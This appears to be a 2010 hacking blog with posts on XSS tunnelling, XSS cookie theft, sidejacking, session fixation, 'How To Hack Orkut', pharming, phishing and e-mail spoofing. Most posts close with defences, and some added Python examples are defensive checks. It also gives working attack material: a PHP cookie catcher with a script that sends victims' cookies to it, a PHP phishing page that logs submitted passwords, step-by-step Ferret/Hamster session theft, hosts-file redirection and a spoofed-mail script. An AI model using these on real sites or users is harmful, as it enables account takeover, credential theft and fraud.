Friday, December 31, 2010


  • What is XSS Tunnelling?
XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel so that virtually any application that supports HTTP proxies can be used over it. XSS Tunnel is a standard HTTP proxy which sits on an attacker’s system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server. The XSS Tunnel converts requests and responses transparently, validating the HTTP responses and the XSS Shell requests.

  • XSS Channel:
An XSS Channel is an interactive communication channel between two systems
which is opened by an XSS attack. At a technical level, it is a type of AJAX
application which can obtain commands, send responses back and is able to talk

  • XSS Shell:
The XSS Shell is a tool that can be used to set up an XSS Channel between a victim and an attacker, so that the attacker can control the victim’s browser by sending it commands. This communication is bi-directional.

Download XSS Shell from here.

  • Example:
To get the XSS Shell to work, an attacker needs to inject the XSS Shell’s JavaScript reference by way of an XSS attack. The attacker is then able to control the victim’s browser. After this point the attacker can see requests and responses and is able to instruct the victim’s browser to carry out requests, etc.

  • How Does XSS Shell Work?
Firstly, the server-side part of the XSS Shell coordinates the channel between an attacker and the victim. It is a server-side application written in ASP and requires an IIS web server. It uses an MS Access database as storage.

The second part of the tool is client-side and written in JavaScript. This loads in the
victim’s browser and is responsible for the receiving and processing of commands
together with providing the channel between the victim and the attacker. This code
was tested under Firefox, IE6 and IE7.

The final part of the XSS Shell is the administration interface. From this interface an attacker can send new commands and instantly receive the responses from the victim’s browser (or from several victims’ browsers). Again it is ASP and requires IIS.

1. An attacker infects a website with a persistent or reflected (temporary) XSS attack which calls the remote XSS Shell JavaScript.

2. The victim follows a link or visits the page and executes the JavaScript within that domain.

3. The victim’s browser begins to perform periodic requests to the XSS Shell server, looking for new commands.

4. When the victim’s browser receives a new command (such as Get Cookies, Execute custom JavaScript, Get Key logger Data, etc.) it processes it and returns the results to the XSS Shell.

5. The attacker can push new commands to the victim’s browser(s) and view the results from the XSS Shell administration interface.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Tuesday, December 7, 2010


  • What is Cross-Site Scripting ?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. The malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site.

  • Techniques :
Basically, Cross Site Scripting takes advantage of a web application that accepts user input but does not filter it properly. It allows an attacker to inject HTML, JavaScript or other malicious code; such code is mostly used to steal information from the user, and most often to steal cookies.

These cookies are used to maintain the user's authentication on that particular website. So the basic idea is that if an attacker can manage to get the cookies of a particular user, then he may easily log in to their account.

There are basically three types of XSS attacks:

1. Persistent XSS:

Persistent or Stored or Type-I XSS occurs when the data provided by the attacker is saved by the server, and then permanently displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping.

Vulnerability Testing:

Let's log in as a user on a particular forum or discussion board. Once you are logged in, create a new thread, name it anything, and in the body of the thread put:

Script Code:


If you get an alert popping up which says test, then you have found a site that is vulnerable to the persistent attack.

Now the attacker will use a cookie catcher in order to steal the user's session cookie. A cookie catcher is basically a PHP file which can store information sent directly to it from a browser.

Script Code:

<?php
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: '.$ip.'<br> Date and Time: '.$date.'<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header("Location:");
?>

Upload this script to a PHP supported web hosting site like ripway or t35 or

Now we need to change the script that is put in the new thread so that the cookie is sent across to the cookie catcher.

Script Code:

<script>document.location="" + document.cookie</script>

Post this in the body of your thread. Now if someone clicks on the thread, their cookies are sent to you as text and the user is redirected to

2. Non-persistent XSS:

The Non-persistent or Reflected or Type-II XSS vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request.

Many web portals offer a personalized view of a web site and may greet a logged-in user as Welcome, Joe. Sometimes the data referencing a logged-in user is stored within the query string of a URL: http://portal.example/index.php?sessionid=12312312&username=Joe. If an attacker were to modify the username field in the URL, inserting cookie-stealing JavaScript, it would be possible to gain control of the user's account if they managed to get the victim to visit their URL. Most of the time an attacker will URL-encode their malicious payload with an ASCII-to-HEX converter, similar to the example below:

Encoded URL:


Decoding this with a HEX-to-ASCII converter reveals the cookie-stealing URL:

Decoded URL:


3. DOM Based XSS:

In 2005, Amit Klein defined a third type of XSS, which he coined DOM Based or Type-0 XSS. DOM-based XSS is an advanced type of XSS attack which is made possible when the web application’s client side scripts write user provided data to the Document Object Model (DOM). The data is subsequently read from the DOM by the web application and outputted to the browser. If the data is incorrectly handled, an attacker can inject a payload, which will be stored as part of the DOM and executed when the data is read back from the DOM.

The most dangerous part of DOM-based XSS is that the attack is often a client-side attack, and the attacker’s payload is never sent to the server. This makes it even more difficult to detect for Web Application Firewalls (WAFs) and security engineers analyzing the server’s logs since they will never even see the attack.

Among various objects that make up the DOM, there are some objects in particular which an attacker can manipulate in order to generate the XSS condition. Such objects include the URL (document.URL), the part of the URL behind the hash (location.hash) and the Referrer (document.referrer).

  • Protection :
1. The primary defense mechanism to stop XSS is contextual output encoding or escaping.

2. Untrusted HTML input must be run through an HTML policy engine to ensure that it does not contain XSS. Tools such as OWASP AntiSamy and accomplish this task.

3. Besides content filtering, additional security on cookie-based user authentication should be introduced.

4. XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS) by submitting your HTML forms and substituting the form value with strings that are representative of an XSS attack.

5. Acunetix Web Vulnerability Scanner (WVS) Free Edition offers the functionality for anyone who wants to test their own application for Cross Site Scripting.
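As an added example (not code from the original post), the contextual output encoding that item 1 recommends, applied to the "Welcome, Joe" page from the reflected-XSS section: the same untrusted username is placed in HTML text, an attribute, a JavaScript string and a URL parameter, each encoded for its context. The payload string and the evil.example host are constructed for the demonstration.

```python
"""Contextual output encoding for the places untrusted text most often lands
in a page. Added example, not code from the original post."""
import html
import json
from urllib.parse import quote

# Constructed sample: the shape of the cookie-stealing payload shown earlier.
UNTRUSTED = '"><script>document.location="http://evil.example/?c="+document.cookie</script>'


def encode_html_text(value: str) -> str:
    """HTML body context (<p>...</p>): escape &, <, > and both quote characters."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """HTML attribute context: the value is always emitted inside double quotes,
    so an injected quote cannot terminate the attribute."""
    return '"' + html.escape(value, quote=True) + '"'


def encode_js_string(value: str) -> str:
    """JavaScript string literal inside a <script> block. json.dumps yields a
    quoted, escaped literal; '<' and '>' are escaped as well so the sequence
    </script> can never close the enclosing script element."""
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e")


def encode_url_param(value: str) -> str:
    """URL query parameter context: percent-encode everything but unreserved chars."""
    return quote(value, safe="")


def render_greeting(username: str) -> str:
    """Renders the greeting page with the username in four contexts, each
    encoded for that context. Encoding the value once with the wrong encoder
    (for example HTML-escaping inside the script block) would not be enough."""
    return (
        "<p>Welcome, " + encode_html_text(username) + "</p>\n"
        + '<input type="text" name="username" value=' + encode_html_attr(username) + ">\n"
        + "<script>var user = " + encode_js_string(username) + ";</script>\n"
        + '<a href="/profile?username=' + encode_url_param(username) + '">profile</a>'
    )


def contains_active_markup(rendered: str) -> bool:
    """Sanity check: does the injected script tag or an attribute break-out
    survive in the rendered page?"""
    lowered = rendered.lower()
    return "<script>document" in lowered or '"><' in lowered
```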



  • What is Sidejacking ?
Sidejacking is the process of sniffing cookie information, then replaying them against websites in order to clone a victim’s session. We use the term sidejacking to distinguish this technique from man-in-the-middle hijacking. Whereas man-in-the-middle hijacking interferes with the original session, sidejacking does not. The victim continues to use his session blissfully unaware that we are also in his account.

SideJacking works only if the site uses a cookie that is sent over a non-SSL connection, so any web site that uses SSL exclusively would be safe from SideJackers. SideJacking was first demonstrated by Robert Graham, CEO of Errata Security, at Black Hat in 2007.

  • Techniques :
All you need to do in order to sidejack is sniff cookies off the wire and edit cookies. This can be done with a wide variety of tools.

1. WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

Download and install Winpcap from here.

2. Graham leveraged the tools Ferret, essentially a packet sniffing tool that captures cookies and writes them to a hamster.txt file, and Hamster, basically a local proxy that creates a web front end for exploiting the cookie information captured by Ferret.

Download and install Ferret & Hamster from here.

3. Unzip the tools into a directory such as C:\sidejacking.

4. Open a command prompt and change to that directory as cd c:\sidejacking.

5. Use ferret -W to figure out which interface you want to sniff.

6. Use ferret -i n to start sniffing cookies. Here n is the interface number.

7. Now use hamster in the same directory as hamster.txt to start the proxy.

8. Set up a browser to use the proxy at

9. In that browser, go to http://hamster to go to the proxy console window.

10. Select a victim, then click on a URL to sidejack it.

  • Countermeasures :
1. Always try to stick to secured WiFi networks that you know and trust that would not have any strangers on it running packet sniffers.

2. Never use a Wi-Fi hotspot to access sensitive information unless you are using a VPN (virtual private network) or SSL (secure sockets layer).

3. Graham said that Google Mail users could switch to and secure their session from such snooping.
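An added example (not from the original post) of the check a site owner would run against the countermeasures above: audit the Set-Cookie headers of a response and flag any session cookie that lacks the Secure flag (sniffable over plain HTTP, exactly what Ferret collects) or the HttpOnly flag (readable by document.cookie, the XSS theft from the previous post). The response text and the list of session cookie names are constructed assumptions.

```python
"""Audit Set-Cookie headers for the flags that blunt sidejacking (Secure) and
cookie theft through XSS (HttpOnly). Added example, not from the original post."""
from dataclasses import dataclass, field
from typing import List

# Cookie names that commonly carry the session identifier; an assumption for
# the example, extend it for the application under review.
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid", "sid"}


@dataclass
class CookieReport:
    name: str
    secure: bool
    http_only: bool
    problems: List[str] = field(default_factory=list)


def parse_set_cookie(header_value: str) -> CookieReport:
    """Parses one Set-Cookie header value into its name and flag presence."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    return CookieReport(name=name, secure="secure" in attrs, http_only="httponly" in attrs)


def is_session_cookie(name: str) -> bool:
    lowered = name.lower()
    return lowered in SESSION_COOKIE_NAMES or "sess" in lowered


def audit_response(raw_response: str) -> List[CookieReport]:
    """Walks the header block of an HTTP response and reports every session
    cookie, noting whether it can leak over cleartext or to script."""
    headers, _, _ = raw_response.partition("\r\n\r\n")
    reports = []
    for line in headers.split("\r\n"):
        if not line.lower().startswith("set-cookie:"):
            continue
        report = parse_set_cookie(line.split(":", 1)[1])
        if not is_session_cookie(report.name):
            continue
        if not report.secure:
            report.problems.append("missing Secure: sent over plain HTTP, can be sniffed (sidejacking)")
        if not report.http_only:
            report.problems.append("missing HttpOnly: readable via document.cookie (XSS theft)")
        reports.append(report)
    return reports


# Constructed sample response: one well-protected session cookie, one exposed
# one, and a non-session cookie that the audit ignores.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PHPSESSID=abc123; Path=/; Secure; HttpOnly\r\n"
    "Set-Cookie: sessionid=def456; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html></html>"
)
```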



  • What is Session Fixation ?
Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack exploits a limitation in the way the vulnerable web application manages the session ID: when authenticating a user, it does not assign a new session ID, which makes it possible to keep using an existing session ID.

The attack consists of inducing a user to authenticate himself with a known session ID, and then hijacking the user-validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.

  • Attack Scenario :
1. Mallory has determined that http://unsafe/ accepts any session identifier, accepts session identifiers from query strings and has no security validation. http://unsafe/ is thus not secure.

2. Mallory sends Alice an e-mail: "Hey, check this out, there is a cool new account summary feature on our bank, http://unsafe/?SID=I_WILL_KNOW_THE_SID". Mallory is trying to fixate the SID to I_WILL_KNOW_THE_SID.

3. Alice is interested and visits http://unsafe/?SID=I_WILL_KNOW_THE_SID. The usual log-on screen pops up, and Alice logs on.

4. Mallory visits http://unsafe/?SID=I_WILL_KNOW_THE_SID and now has unlimited access to Alice's account.

  • Attack Process :
1. Session Setup:

First, the attacker either sets up a trap session on the target server and obtains that session’s ID, or selects an arbitrary session ID to be used in the attack. In some cases, the established trap session needs to be maintained by repeatedly sending requests referencing it to avoid idle session timeout.

2. Session Fixation:

Next, the attacker needs to introduce her session ID to the user’s browser, thereby fixing his session.

3. Session Entrance:

Finally, the attacker has to wait until the user logs in to the target server using the previously fixed session ID and then enter the user’s session.

  • Attack Example :
1. First, the attacker, who in this case is also a legitimate user of the system, logs in to the server and is issued a session ID 1234.

2. Then he sends a hyperlink http://online.worldbank.dom/login.jsp?sessionid=1234 to the user, trying to lure him into clicking on it.

3. The user clicks on the link, which opens the server’s login page in his browser.

4. Upon receipt of the request for login.jsp?sessionid=1234, the web application has established.

5. Finally, the user provides his credentials to the login script and the server grants him access to his bank account.

6. At this point, knowing the session ID, the attacker can also access the user’s account via account.jsp?sessionid=1234.

  • Countermeasures :
1. Web applications must ignore any session ID provided by the user’s browser at login and must always generate a new session to which the user will log in if successfully authenticated.

2. If possible, a web application on a strict system should only issue session IDs of newly generated sessions to users after they have successfully authenticated.

3. Session identifiers in URL (GET or POST variables) are not recommended as they simplify this attack. The session identifier on most modern systems is stored by default in an HTTP cookie, which has a moderate level of security. Use of the SSL/TLS session identifier is very secure.
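An added example (not from the original post) that replays the Mallory/Alice scenario against a minimal server-side session store, once with the weak behaviour (any client-supplied SID is adopted and kept across login) and once with countermeasure 1 applied (the presented SID is discarded at login and a fresh one is generated). Both the arbitrary-SID and the trap-session variants from the attack process are covered; the user table and password are constructed for the demo.

```python
"""Session fixation: vulnerable session handling beside the regenerate-on-login
countermeasure. Added example, not part of the original post."""
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Constructed demo credential table; a real application checks a password hash.
USERS = {"alice": "correct horse"}


def check_credentials(username: str, password: str) -> bool:
    expected = USERS.get(username)
    return expected is not None and hmac.compare_digest(expected, password)


class SessionStore:
    def __init__(self, regenerate_on_login: bool):
        self.regenerate_on_login = regenerate_on_login
        self._sessions: Dict[str, Optional[str]] = {}  # sid -> logged-in user or None

    def new_session(self) -> str:
        """Issues a fresh, unpredictable session ID (an anonymous session)."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = None
        return sid

    def login(self, presented_sid: Optional[str], username: str, password: str) -> str:
        if not check_credentials(username, password):
            raise PermissionError("bad credentials")
        if self.regenerate_on_login:
            # Countermeasure: discard whatever the client presented, even if it
            # names a real pre-login session, and issue a brand-new ID.
            self._sessions.pop(presented_sid, None)
            sid = self.new_session()
        else:
            # Vulnerable: keep the client's ID, creating it if the server has
            # never seen it (the "accepts any session identifier" weakness).
            sid = presented_sid or self.new_session()
        self._sessions[sid] = username
        return sid

    def whoami(self, sid: str) -> Optional[str]:
        return self._sessions.get(sid)


def run_scenario(regenerate_on_login: bool, trap_session: bool) -> Tuple[Optional[str], bool]:
    """Replays the scenario. Returns (user Mallory sees with the fixed SID,
    whether Alice ended up with a different SID than the one she arrived with)."""
    store = SessionStore(regenerate_on_login)
    # Session setup: Mallory either invents an ID or obtains a real pre-login
    # session from the server (the trap session).
    fixed_sid = store.new_session() if trap_session else "I_WILL_KNOW_THE_SID"
    # Session fixation: Alice follows the link carrying that SID and logs in.
    alice_sid = store.login(fixed_sid, "alice", "correct horse")
    # Session entrance: Mallory presents the fixed SID after Alice has logged in.
    return store.whoami(fixed_sid), alice_sid != fixed_sid
```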



  • What is Session Hijacking ?
Session hijacking is the act of taking control of a user session after successfully obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress.

TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine.

  • Techniques :
There are mainly three methods used to perpetrate a session hijack. These are:

1. Session Fixation:

The session fixation attack is a class of session hijacking. Ordinary session hijacking steals the established session between the client and the web server after the user logs in; session fixation instead fixes a session ID on the victim's browser, so the attack starts before the user logs in.

For detailed info on How Session Fixation works click here.

2. Session Sidejacking:

Here the attacker uses packet sniffing to read network traffic between two parties and steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client.

1. First the attacker uses a network sniffer to capture a valid session token, the session ID.

2. Now he manipulates the token session to gain unauthorized access to the Web Server or hijack the victim's web session.

For detailed info on How Session Sidejacking works click here.

3. Cross-Site Scripting:

The attacker can compromise the session token by using malicious code or programs running at the client-side. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker. The example shows how the attacker could use an XSS attack to steal the session token.

For detailed info on How XSS works click here.

  • Protection :
1. Regenerating the session id after a successful login. This prevents session fixation because the attacker does not know the session id of the user after he has logged in.

2. Some services make secondary checks against the identity of the user. For example it will change the value of the cookie with each and every request.

3. Users may also wish to log out of websites whenever they are finished using them.

4. Encryption of the data passed between the parties; in particular the session key. This technique is widely relied-upon by web-based banks and other e-commerce services.


Saturday, December 4, 2010


  • How To Hack Orkut ?

Hello guys! Most of you want to know the way to hack an Orkut account. Today I'll discuss this topic. But before this you should know the fact that Google uses a 4-level Orkut login which makes it difficult to hack using the brute force method.

1st Level: SSL or 128 bit secured connection.
2nd Level: Google account checks for a cookie in the system of the user.
3rd Level: Google provides a redirection to the entered User information.
4th Level: Google doesn't use conventional php or aspx or asp coding so impossible to attack using input validation attack.

So it is not an easy task to hack Orkut by breaking this security. However, some people still manage to get access to others’ Orkut accounts. Now the question is how they do this.

  • Techniques :


Using keyloggers is one of the easiest ways to hack an Orkut password. Keylogger programs can spy on what the user types on the keyboard. If you think that you can just uninstall such programs, you are wrong, as they are completely hidden.

Key logger software can record instant messages, e-mail and any information you type at any time on your keyboard. The log file created by the key logger can then be saved to a specific location or mailed to the concerned person.

For detailed info on How to use a Keylogger click here.


Phishing is the most popular way of stealing others’ passwords. This attack works by using fake login pages to fool innocent Orkut users into entering their Orkut username and password in these fake login pages instead of the real ones.

When the users land on this page they enter their Orkut username and password thinking it to be the real page, but actually it is the other way round: it submits all the entered details to the creator of the fake login page.

You get a link to a community in a scrap. It may be something like:

It is okrut instead of orkut. This is definitely a trap created by the hacker to hack your Orkut password.

For detailed info on How Phishing Works click here.


In computer science, session hijacking refers to the exploitation of a valid computer session, sometimes also called a session key, to gain unauthorized access to information or services in a computer system.

To steal one's session, the attacker generally uses a network sniffer or a cookie catcher. You must have seen the circulating or flooding scraps that ask you to paste a JavaScript snippet in your address bar. Well, sometimes such a script may reveal your private information.

For detailed info on How Session Hijacking Works click here.

  • Protect Your Orkut Account :

1. Never try to log in to your Orkut account from sites other than

2. Never click on any links from the sources you don’t trust while accessing your Orkut account.

3. Never ever use Javascripts on Orkut, no matter whatever it claims to do.

4. Never tick the box Remember Me on the orkut homepage if you are surfing from a cafe or a public area.

5. McAfee SiteAdvisor is a service that reports on the safety of web sites by alerting users to possible phishing and identity theft scams.


Thursday, December 2, 2010


  • What is Pharming ?
You must be well aware of phishing and its potential to cause damage. In phishing you are spammed with malicious, deceiving e-mail requests to visit spoofed web sites which appear legitimate.

Pharming on the other hand poisons a DNS server by infusing false information into the DNS server, resulting in a user’s request being redirected elsewhere. Your browser, however will show you are at the correct Web site, which makes pharming a bit more serious and more difficult to detect.

Pharming is a derivative of phishing. Both use “ph” instead of an “f” and are computer slang.

  • What is DNS :
The Domain Name System (DNS) is a hierarchical naming system, which translates human-friendly computer hostnames into IP addresses. For example, translates to

  • DNS Poisoning :
Pharming attacks do not take advantage of any new technique. They use the well known DNS cache poisoning, domain spoofing and domain hijacking techniques that have been around for quite long.

1. The hacker hacks into the DNS server and changes the IP address for He puts in the IP of (Hacker’s site).

2. The user wants to go to the website and types the address in the web browser.

3. User’s computer queries the DNS server for the IP address of

4. Since the DNS server has already been poisoned by the attacker, it returns the IP address of to the user’s computer.

5. The user has now been fooled into visiting the fake website controlled by the attacker rather than the original website.

  • Host Redirection :
The hosts file is a computer file used in an operating system to map hostnames to IP addresses. The hosts file is a plain-text file and is traditionally named hosts.

Location: %SystemRoot%\system32\drivers\etc\

Add an entry at the bottom where it says : localhost

What it will do is redirect the person from myspace website to ip which is the ip for

Thus the attacker can manipulate the IP and take the victim towards any fake website.
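An added example (not from the original post) of the check a defender would run on a machine suspected of this kind of redirection: parse the hosts file at the path given above and report any watched hostname pinned to an address that is neither loopback nor unspecified. The hosts file content, the 192.0.2.45 address and the watched hostname list are constructed for the demo.

```python
"""Audit a hosts file for pharming-style redirections: hostnames that should be
resolved through DNS but are pinned to a routable address.
Added example, not from the original post."""
import ipaddress
from typing import List, Tuple

# Constructed sample hosts file content (the real file lives at the path above).
SAMPLE_HOSTS = """\
# sample hosts file, constructed for this example
127.0.0.1       localhost
::1             localhost
192.0.2.45      www.myspace.com myspace.com   # constructed suspicious entry
0.0.0.0         ads.tracker.example           # ad-blocking style entry, harmless
"""

# Hostnames an attacker would profit from redirecting; an assumption for the
# example, replace with the sites that matter to the machine's users.
WATCHED_HOSTS = {"www.myspace.com", "myspace.com", "www.paypal.com", "login.live.com"}


def parse_hosts(text: str) -> List[Tuple[str, List[str]]]:
    """Returns (ip, [hostnames]) for every non-comment, non-empty line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        entries.append((fields[0], [h.lower() for h in fields[1:]]))
    return entries


def is_harmless_target(ip_text: str) -> bool:
    """Loopback and unspecified addresses (127.0.0.1, ::1, 0.0.0.0, ::) block or
    localise a name rather than redirect it to another host."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_unspecified


def find_pharming_entries(text: str) -> List[Tuple[str, str]]:
    """Lists (hostname, ip) pairs where a watched hostname is pinned to a real address."""
    findings = []
    for ip, hostnames in parse_hosts(text):
        if is_harmless_target(ip):
            continue
        for host in hostnames:
            if host in WATCHED_HOSTS:
                findings.append((host, ip))
    return findings
```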

  • Prevent Pharming :
1. Pharming-conscious web sites that use forms to accept passwords or other sensitive information should ensure that the page containing the form is itself served using HTTPS.

2. If you visit an SSL-enabled website, look out for this warning message window. If you get it, double-check whether the website you are visiting gave this message on earlier visits. Check that the URL is the one you intended to go to.

3. SpoofStick is a simple browser extension that helps users detect fake websites. This tool is free and installs itself into your browser. It is available for Firefox and Internet Explorer. For more information go to SpoofStick.



  • What is Phishing ?
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.

  • Phishing E-mail :
Phishing is typically carried out by e-mail or instant messaging. Phishing e-mail messages take a number of forms:

1. They might appear to come from your bank or financial institution, a company you regularly do business with, such as Microsoft, or from your social networking site.

2. Spear phishing is a targeted form of phishing in which an e-mail message might look like it comes from your employer, or from a colleague who might send an e-mail message to everyone in the company, such as the head of human resources or IT.

3. Phone phishing scams direct you to call a customer support phone number. A person or an audio response unit waits to take your account number, personal identification number, password, or other valuable personal data.

Here is an example of what a phishing scam in an e-mail message might look like.

  • Phishing Techniques :
1. Link Manipulation:

Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL

Another method of spoofing uses links like: this URL actually points to the facebook section (i.e. the fake login page) of the ripway website.

2. Filter Evasion:

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails.
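An added example (not from the original post) of the link inspection that counters the manipulation tricks above: the registrable domain of the URL, not the whole URL, is compared against the brands a link claims to reach, so the okrut/orkut misspelling, a brand placed in a subdomain (paypal.com.evil.example), a brand hidden before an '@' in the URL, and a brand that only appears in the path of a hosting site are each classified. The trusted-domain list and the hostnames are constructed assumptions.

```python
"""Classify the destination of a link before trusting it.
Added example, not from the original post."""
from urllib.parse import urlsplit

# Assumption for the example: the domains that legitimately serve the brands
# we expect links in our mail to point at.
TRUSTED_DOMAINS = {"orkut.com", "paypal.com", "facebook.com", "ebay.com"}


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Good enough for .com-style names; country
    second-level domains such as co.uk need a public-suffix list."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein (optimal string alignment) distance, so that the
    transposition okrut/orkut counts as a single edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify_link(url: str) -> str:
    """Returns one of: trusted, userinfo-trick, brand-in-subdomain, lookalike,
    brand-in-path, unknown."""
    parts = urlsplit(url)
    if not parts.hostname:
        return "unknown"
    if parts.username is not None:
        # http://www.paypal.com@evil.example/ : the text before '@' is not the host
        return "userinfo-trick"
    host = parts.hostname.lower()
    domain = registrable_domain(host)
    if domain in TRUSTED_DOMAINS:
        return "trusted"
    brands = [t.split(".")[0] for t in sorted(TRUSTED_DOMAINS)]
    labels = host.split(".")
    # A brand name appearing as a subdomain of an untrusted domain.
    if any(brand in labels for brand in brands):
        return "brand-in-subdomain"
    # One-edit misspelling of a brand in the registrable domain (okrut vs orkut).
    if any(edit_distance(domain.split(".")[0], brand) <= 1 for brand in brands):
        return "lookalike"
    # Brand only in the path: a fake page hosted on a free hosting site.
    if any(brand in parts.path.lower() for brand in brands):
        return "brand-in-path"
    return "unknown"
```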

  • Fake Login Page :
A fake login page looks exactly like the original page of the website. But in the page source, the action field is replaced by a PHP script. This PHP script serves two purposes:

Script Code:

<?php
header('Location: ');
$handler = fopen("log.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handler, $variable);
    fwrite($handler, "=");
    fwrite($handler, $value);
    fwrite($handler, "\r\n");
}
fwrite($handler, "\r\n");
fclose($handler);
?>

1. First it captures the input data (username & password) and sends it to the attacker.

2. It redirects the victim to the original page to make him believe that the login is normal.

  • Phishing Targets :
1. Social networking sites like Facebook, MySpace and Orkut are now a prime target of phishing, since the personal details on such sites can be used in identity theft.

2. The RapidShare file sharing site has been targeted by phishing to obtain a premium account.

3. Almost half of phishing thefts in 2006 were committed by groups operating through the Russian Business Network based in St. Petersburg.

4. eBay, PayPal and the other online banks are also targeted.

  • Anti Phishing Info :
1. Never assume that an email is valid based on the sender’s email address. The email may be forged.

2. A trusted bank such as CITIBANK will never ask you for your full name and password in a CITIBANK email.

3. An email from a trusted organization will never contain attachments or software.

4. Always ensure that you're using a secure website when submitting credit card or other sensitive information.

5. Get in the habit of looking at the address line. Were you directed to PayPal? Or something different like


Wednesday, December 1, 2010


  • What is E-mail Forging ?
E-mail forging is e-mail activity in which the sender address and other parts of the e-mail header are altered to appear as though the e-mail originated from a different source. It is commonly used in spam and phishing e-mails to hide the origin of the e-mail message.

Examples of spoofed email that could affect the security of your site include:

  • email claiming to be from a system administrator requesting users to change their passwords to a specified string and threatening to suspend their account if they do not do this.
  • email claiming to be from a person in authority requesting users to send them a copy of a password file or other sensitive information.
  • you can send an email to your friend with the following sender details: From: Bill Gates <>

  • Methods:
1. Using SMTP Server:

One can send Anonymous emails simply by installing an SMTP server in his system and using the TELNET commands:

This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo Mail block emails that are sent directly from a PC.

2. Using Email Script:

First we need to find a PHP-supporting web hosting provider like Ripway or Freewha or Usually they are all trusted and authorised.

Script Code:


<?php
$to = "";
$subject = "Test mail";
$message = "Hello! This is a simple email message.";
$from = "";
$headers = "From: $from";
mail($to, $subject, $message, $headers);
echo "Mail Sent.";
?>

Now upload the PHP script to that site and set the permission to 777. You are done...

  • Prevent Spam :
1. Use cryptographic signatures (e.g., PGP "Pretty Good Privacy" or other encryption technologies) to exchange authenticated email messages.

2. Similarly, sites may wish to consider enabling SSL/TLS in their mail transfer software. Using certificates in this manner increases the amount of authentication performed when sending mail.

3. Configure your mail delivery daemon to prevent someone from directly connecting to your SMTP port to send spoofed email to other sites.

4. Educate your users about your site's policies and procedures in order to prevent them from being "social engineered," or tricked, into disclosing sensitive information (such as passwords).
